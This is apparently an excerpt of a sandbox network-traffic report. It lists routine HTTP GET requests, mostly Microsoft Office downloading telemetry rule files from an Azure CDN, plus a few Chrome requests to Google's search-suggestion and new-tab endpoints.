Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule90401v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
